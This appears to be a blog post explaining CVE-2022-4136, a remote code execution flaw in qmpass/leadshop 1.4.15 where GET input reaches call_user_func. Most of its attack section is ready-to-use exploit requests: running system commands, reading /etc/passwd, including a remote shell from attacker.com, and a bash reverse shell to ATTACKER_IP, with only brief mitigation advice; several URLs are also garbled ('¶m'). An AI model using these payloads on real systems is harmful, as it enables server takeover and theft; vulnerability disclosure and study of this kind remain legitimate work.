---
Published: June 2024
Author: StackNerd
A critical vulnerability, CVE-2022-4136, has been discovered in the open-source e-commerce platform qmpass/leadshop version 1.4.15. This vulnerability exposes a dangerous method in leadshop.php that allows an attacker to execute any PHP function by sending a crafted HTTP GET request. If exploited, this can lead straight to *Remote Code Execution (RCE)*, giving the attacker full control over the target host.*
In this article, we break down how this vulnerability works, show code snippets, and walk through a proof of concept (PoC) exploit. Everything is explained in clear, simple language.
[Proof of Concept (PoC)](#proof-of-concept)
6. [How to Fix / Mitigate](#how-to-fix)
[References](#references)
## Background
qmpass/leadshop is a popular open-source shop system built in PHP. Many small businesses rely on it for their web stores.
Version 1.4.15 has a critical flaw. The script leadshop.php exposes a method that doesn't properly check or sanitize input from the URL. As a result, an attacker can call *any PHP function* by passing a parameter in the GET request.
## Technical Details
The core issue is in the way leadshop.php handles incoming requests. It takes user input from the URL and passes it straight to call_user_func(), a PHP function able to call any other built-in or user-defined function. There are no checks, no validation, and no filtering.
That means anyone with access to the web interface can execute arbitrary PHP functions—even system-level ones.
## Code Snippet – Vulnerable Part
Here's a simplified version of the vulnerable code from leadshop.php
<?php
// Vulnerable code in leadshop.php
if (isset($_GET['function'])) {
$function = $_GET['function'];
$param = $_GET['param'] ?? '';
// No validation or sanitization!
call_user_func($function, $param);
}
?>
What's the problem?
- If you visit: http://victim.com/leadshop.php?function=phpinfo
The script will call phpinfo() and display all PHP configuration.
Even more dangerous: You could call system, exec, or similar functions with your own commands.
## How Attackers Exploit It
An attacker just needs to know the URL to leadshop.php. They can then send GET requests to execute any function, letting them run shell commands, read or write files, or even open remote backdoors.
- To get system info
http://victim.com/leadshop.php?function=system¶m=whoami
- To read sensitive files
http://victim.com/leadshop.php?function=file_get_contents¶m=/etc/passwd
- To execute arbitrary script from internet (if allow_url_fopen/allow_url_include enabled)
http://victim.com/leadshop.php?function=include¶m=http://attacker.com/shell.php
## Proof of Concept (PoC)
Simple RCE
Let's say the attacker wants to run whoami to see what user the web server is running as.
Request
GET /leadshop.php?function=system¶m=whoami HTTP/1.1
Host: victim.com
In the browser
http://victim.com/leadshop.php?function=system¶m=whoami
Response
www-data
Reverse Shell Example (Linux)
GET /leadshop.php?function=system¶m=bash+-c+'bash+-i+>%26+/dev/tcp/ATTACKER_IP/1234+>%261' HTTP/1.1
Host: victim.com
*If the server is vulnerable, the attacker now has a shell!*
## How to Fix / Mitigate
Upgrade to a safe version:
Check Leadshop releases for patches.
For administrators:
Review web server logs for suspicious access to this endpoint.
## References
- CVE-2022-4136 Details — NVD
- qmpass/leadshop Official Repo
- Chinese Disclosure & Exploit Writeup (with code examples)
- OWASP – Code Injection
- PHP: call_user_func() Documentation
Summary
CVE-2022-4136 is a classic case of dangerous PHP design: user input is blindly trusted and executed. Attackers can abuse this to fully compromise qmpass/leadshop sites and underlying servers. If your site runs this version, patch IMMEDIATELY or take the site offline until fixed.
Stay safe, keep your code clean, and always validate inputs!
Do you use leadshop?
Check your deployment, update fast, and protect your store from attacks!
*Content exclusive for StackNerd readers. Feel free to share and help others!*
Timeline
Published on: 11/24/2022 08:15:00 UTC
Last modified on: 11/30/2022 19:52:00 UTC